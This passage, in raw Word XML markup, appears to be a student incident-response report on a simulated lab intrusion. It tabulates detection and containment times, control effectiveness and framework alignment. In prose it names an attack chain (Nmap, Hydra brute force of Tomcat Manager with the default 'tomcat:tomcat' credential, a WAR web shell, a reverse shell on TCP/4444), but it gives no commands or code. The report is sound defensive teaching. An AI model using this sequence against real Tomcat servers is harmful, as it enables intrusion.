        </w:tc>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Result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Time to Detection (TTD)</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&lt; 30 min from first IOC</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38 min (02:03 scan → 02:41 alert)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="856404"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MISS — under review</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Time to Analyst Response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&lt; 5 min from L12 alert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 min 15 sec (email to ack)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="155724"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MET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Suricata Auto-Block (Kali IP)</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&lt; 30 sec from scan start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61ms (02:03:14.902Z)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="155724"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MET (automated)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Short-Term Containment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&lt; 30 min from detection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17 min (02:41 → 02:58)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="155724"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MET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OT Boundary Confirmation</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&lt; 20 min from probe alert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12 min (pfSense deny review)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="155724"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MET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Full Containment</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&lt; 6 hours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4h 17m</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="155724"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MET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System Recovery (snapshot restore)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&lt; 2 hours (lab: snapshot restore)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58 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="155724"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MET</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7.2 Controls Effectiveness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360"/>
        <w:gridCol w:w="3800"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="23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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Finding / Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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pfSense DENY-TOMCAT-TO-OT-EQUIV Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="155724"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">EFFECTIVE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Blocked all 3 OT probe SYN packets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OT-equiv segment confirmed unaffected — deny-all rule held on all attempts; Wazuh alert L12 confirmed in time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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Snort IDS (pfSense pkg)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="155724"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">EFFECTIVE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Alert in &lt;1s at 20 SYN/5s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SID 9000001 fired correctly; Wazuh received alert; contributed to 100441 multi-source correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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Suricata IPS (pfSense pkg)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="155724"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">EFFECTIVE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C2 TCP/4444 blocked in 61ms</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SID 9100003 dropped all reverse shell SYNs; Kill States terminated existing state; no C2 session established</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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Wazuh SIEM Correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="155724"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">EFFECTIVE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L12 alert in 29s of rule 100441 match</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3-source match confirmed true positive; email alert fired; active response block applied automatically</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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Wazuh Active Response (iptables)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="155724"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">EFFECTIVE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Host-level block in 2 sec (automated)</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iptables rule applied to Tomcat agent on L12 alert — inbound from Kali blocked at host before analyst responded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Tomcat Manager Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">FAILED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Default credential allowed brute-force</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Root cause: tomcat:tomcat default credential not changed pre-exercise. Remediation: Manager restricted to localhost; strong credential enforced post-incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Snort Brute-Force Rule (SID 9000005)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="856404"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PARTIAL</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Wazuh 100442 fired but didn't block</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Snort IDS is detection-only — could not prevent brute-force success. Improvement: Suricata HTTP rate-limiting rule added post-incident</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8. Compliance and Framework Alignment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The incident response process for INC-JLR-LAB-2026-0312 was executed in alignment with the following frameworks and standards, adapted to the open-source lab environment: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Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>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Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Lab Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="23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Evidence</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NIST SP 800-61r2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4-phase IR lifecycle: Prep, Detect/Analyze, Contain/Eradicate/Recover, Post-Incident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Full lifecycle executed per lab CIRP: all 4 phases documented with timestamps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Wazuh incident log; pfSense deny log; Tomcat access.log; VM snapshot records</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NIST SP 800-61r2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Document all IOCs and preserve evidence chain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All Wazuh alerts exported JSON; pfSense logs archived; Snort/Suricata alert files preserved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Exported alert archives; log file timestamps; Wazuh dashboard export PDF</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ISO/IEC 27035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Detect events, report, assess, respond, learn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All 5 stages executed; PIR completed; root cause identified; controls improved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Wazuh INC-JLR-LAB-2026-0312 timeline; post-exercise report</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NIST SP 800-53 IR-4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Incident handling — contain, eradicate, recover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Containment in 4h 17m; Tomcat snapshot restored; credentials reset; WAR removed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pfSense alias log; Tomcat manager log; Wazuh active response records</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NIST SP 800-53 SI-4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Continuous monitoring — detect attacks and indicators of compromise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Wazuh + Snort IDS + Suricata IPS + pfSense deny logs active throughout; L12 alert in 38 min of first IOC</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Wazuh dashboard; Snort/Suricata alert logs; pfSense system log</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NIST SP 800-53 SC-7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Boundary protection — OT segment isolated from R&amp;D/engineering traffic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pfSense DENY-TOMCAT-TO-OT-EQUIV rule blocked all 3 OT probe attempts; zero packets transited boundary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pfSense firewall deny log; Wazuh rule 100444 alert record</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ISO/IEC 27001 A.16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Information security incident management process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Lab CIRP executed; corrective actions documented; post-incident improvements implemented and verified</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PIR report; Tomcat hardening log; updated Wazuh rules; Suricata rule additions</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9. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">This report has documented the end-to-end monitoring and incident response lifecycle for INC-JLR-LAB-2026-0312 — a Priority 1 simulated credential-based lateral movement and OT boundary probe incident executed within the JLR Trinity Project virtual lab environment. The attack chain — Nmap reconnaissance, Hydra credential brute-force against Apache Tomcat Manager, malicious WAR file deployment and JSP web shell execution, reverse shell attempt via TCP/4444, internal network discovery, and OT-equivalent segment port scan — replicates the multi-stage sophistication of the enterprise JLR scenario using entirely open-source attacker and defender tooling on a single personal laptop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The outcome — full containment in 4 hours 17 minutes with no OT-equivalent segment breached and no confirmed data exfiltration — validates the effectiveness of the lab's layered monitoring and enforcement architecture. Wazuh's multi-source correlation (rule 100441) provided the central detection capability, combining Snort IDS passive alerts, Suricata IPS inline block events, and pfSense firewall deny logs into a single Level 12 Critical incident that triggered automated active response and analyst notification within 29 seconds of the correlation threshold being met.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The pfSense deny-all rule on the OT-equivalent segment boundary (DENY-TOMCAT-TO-OT-EQUIV) was the single most critical containment control — it blocked all 3 OT probe SYN packets without any analyst intervention, confirming that a properly placed firewall rule can protect a sensitive segment even when the host attempting the probe has been fully compromised. Suricata's inline blocking of the TCP/4444 reverse shell prevented the attacker from establishing a persistent C2 channel, significantly limiting post-exploitation capability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The one control that failed — Tomcat Manager's default credential (tomcat:tomcat) — represents the root cause of the entire incident. The lesson maps directly to the enterprise scenario's root cause (CrowdStrike in alert-only mode on VLAN 20): in both cases, a prevention control was not fully enabled, allowing the attacker to complete a critical stage of the attack chain before detection. Post-incident hardening has addressed this in the lab: Manager is now restricted to localhost access only, and strong credentials are enforced.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PROGRAM OUTCOME</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="766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tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">INC-JLR-LAB-2026-0312 is fully documented with raw log evidence from Wazuh, Snort, Suricata, pfSense, and Apache Tomcat; a NIST SP 800-61r2-aligned 4-phase incident response process; and a controls effectiveness assessment. The lab monitoring and incident response posture demonstrates the capability to detect, contain, and recover from a sophisticated multi-stage attack against a combined IT/OT-equivalent virtual environment using exclusively open-source tooling.</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jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Document Control</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Version: 1.0  |  Status: Final  |  Date: April 2026</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Author: DAE Cybersecurity Program  |  Classification: Confidential — Internal Use Only</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="555555"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">This document is produced for educational and program assessment purposes within the DAE Cybersecurity &amp; Networking curriculum.</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5"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve">DAE Cybersecurity Program  |  April 2026</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve">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3864"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve">TRINITY PROJECT  |  JLR — Network Security Event Monitoring &amp; Incident Response</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>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2026-05-04T17:14:06.160Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-04T17:14:06.177Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>